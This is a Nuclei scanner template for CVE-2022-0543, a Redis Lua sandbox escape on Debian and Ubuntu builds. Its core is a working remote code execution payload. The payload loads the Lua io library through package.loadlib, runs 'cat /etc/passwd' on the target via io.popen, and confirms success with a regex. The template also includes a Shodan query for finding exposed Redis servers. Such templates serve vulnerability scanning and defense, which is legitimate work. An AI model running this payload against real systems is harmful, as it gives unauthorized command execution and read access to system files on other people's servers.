nuclei-templates/cves/2022/CVE-2022-0543.yaml

38 lines
1.3 KiB
YAML

id: CVE-2022-0543
info:
name: Redis Sandbox Escape RCE
author: dwisiswant0
severity: critical
reference:
- https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce
- https://attackerkb.com/topics/wyA1c1HIC8/cve-2022-0543/rapid7-analysis#rapid7-analysis
description: |
This template exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The
vulnerability was introduced by Debian and Ubuntu Redis packages that
insufficiently sanitized the Lua environment. The maintainers failed to
disable the package interface, allowing attackers to load arbitrary libraries.
Taken from rapid7/metasploit-framework#16504.
metadata:
shodan-query: "redis_version"
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.00
cve-id: CVE-2022-0543
tags: cve,cve2022,network,redis,unauth,rce
network:
- inputs:
- data: "eval 'local io_l = package.loadlib(\"/usr/lib/x86_64-linux-gnu/liblua5.1.so.0\", \"luaopen_io\"); local io = io_l(); local f = io.popen(\"cat /etc/passwd\", \"r\"); local res = f:read(\"*a\"); f:close(); return res' 0\r\n"
host:
- "{{Hostname}}"
- "{{Host}}:6379"
read-size: 64
matchers:
- type: regex
regex:
- "root:.*:0:0:"